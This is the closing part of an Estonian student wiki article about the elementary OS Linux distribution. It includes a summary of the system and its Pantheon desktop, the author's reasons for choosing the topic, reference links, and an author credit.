Soovituslik oleks teha masinale restart.&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Kokkuvõte&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
elementary OS märksõnadeks võiksid olla: kasutuslihtsus, kergus ja minimalistlik disain ehk teisisõnu on tegu trendika Linuxi distroga. Minu tähelepanek: töölaua keskkonnal Pantheon-il on mõningaid ühiseid jooni just funktsioneerimise ja visuaalse poole pealt Mac OS X-I ja GNOME Shell-iga.&lt;br /&gt;
 &lt;br /&gt;
Miks ma just selle teema valisin? Lauaarvuti, mis tänaseks juba rohkem kui 1.5 aastat niisama laua peal seisnud ja tolmu kogunud on, jooksutab ilmselt eOS-i esimest versiooni Jupiteri (parimal juhul Luna beta 1-te), ent millegipärast ei jõudnudki ma kunagi sellega tutvust sobitada. See on ka üks põhjuseid, miks valisin just teemaks Elementary OS-i, et ise rohkem aimu saada, mis mul laua peal seisab ja samas kuuldu järgi tundus, et tegu on üsnagi jätkusuutliku projektiga- iga-aastaselt on seni katsutud uue versiooniga välja tulla ja ehk on lootust, et sellest areneb ühel päeval midagi suurematki välja.&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Linke külastamiseks&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
*eOS – mitte ainult vaese mehe Apple: http://www.techrepublic.com/article/elementary-os-not-just-the-poor-mans-apple/&lt;br /&gt;
&lt;br /&gt;
*Ühe kasutaja kogemus Pantheoniga: http://www.networkworld.com/article/2599415/opensource-subnet/the-linux-desktop-a-week-review-elementary-oss-pantheon.html&lt;br /&gt;
&lt;br /&gt;
*20 asja, mida pärast eOS Luna paigaldamist teha: http://www.binarytides.com/better-elementary-os-luna/&lt;br /&gt;
&lt;br /&gt;
*15 asja, mida pärast eOS Freya beta 1 paigaldamist teha: http://lmelinux.net/2014/09/15/things-installing-elementary-os-freya-beta/&lt;br /&gt;
&lt;br /&gt;
*Ülemise paneeli kujundamine: http://ubuntuhandbook.org/index.php/2013/10/customize-elementaryos-panel/&lt;br /&gt;
&lt;br /&gt;
*Synapse Indicator: http://www.webupd8.org/2013/06/synapse-indicator-new-search.html&lt;br /&gt;
&lt;br /&gt;
*Dokk-i muutmine: http://rhoconlinux.github.io/plank-themer/&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Kasutatud kirjandus&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
[1] http://elementaryos.org/journal/luna-beta-1-released&lt;br /&gt;
&lt;br /&gt;
[2] http://www.askvg.com/elementary-os-jupiter-awesome-linux-distribution-based-on-ubuntu/&lt;br /&gt;
&lt;br /&gt;
[3] http://elementaryos.org/journal/5-myths-about-elementary&lt;br /&gt;
&lt;br /&gt;
[4] http://www.muylinux.com/2012/10/19/elementary-os-jupiter-deja-de-estar-disponible&lt;br /&gt;
[4] http://itsfoss.com/guide-install-elementary-os-luna/&lt;br /&gt;
&lt;br /&gt;
[5] http://www.webupd8.org/2012/10/elementary-os-jupiter-no-longer.html&lt;br /&gt;
&lt;br /&gt;
[6] http://www.webupd8.org/2012/11/elementary-os-luna-beta-1-available-for.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.phoronix.com/scan.php?page=news_item&amp;amp;px=MTM2NjA&lt;br /&gt;
&lt;br /&gt;
[8] http://www.muktware.com/2013/08/09/mysterious-countdown-appears-on-elementary-os-website/4557/&lt;br /&gt;
&lt;br /&gt;
[9] https://lists.launchpad.net/elementary-dev-community/msg02577.html&lt;br /&gt;
&lt;br /&gt;
[10] http://elementaryos.org/journal/elementary-os-isis-is-now-freya&lt;br /&gt;
&lt;br /&gt;
[11] http://elementaryos.org/journal/freya-beta-1-available-for-developers-testers&lt;br /&gt;
&lt;br /&gt;
[12] http://elementaryos.org/docs/user-guide/technical-specifications&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Autor&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Nimi: Kelly Tragel&lt;br /&gt;
&lt;br /&gt;
Rühm: A21&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
</feed>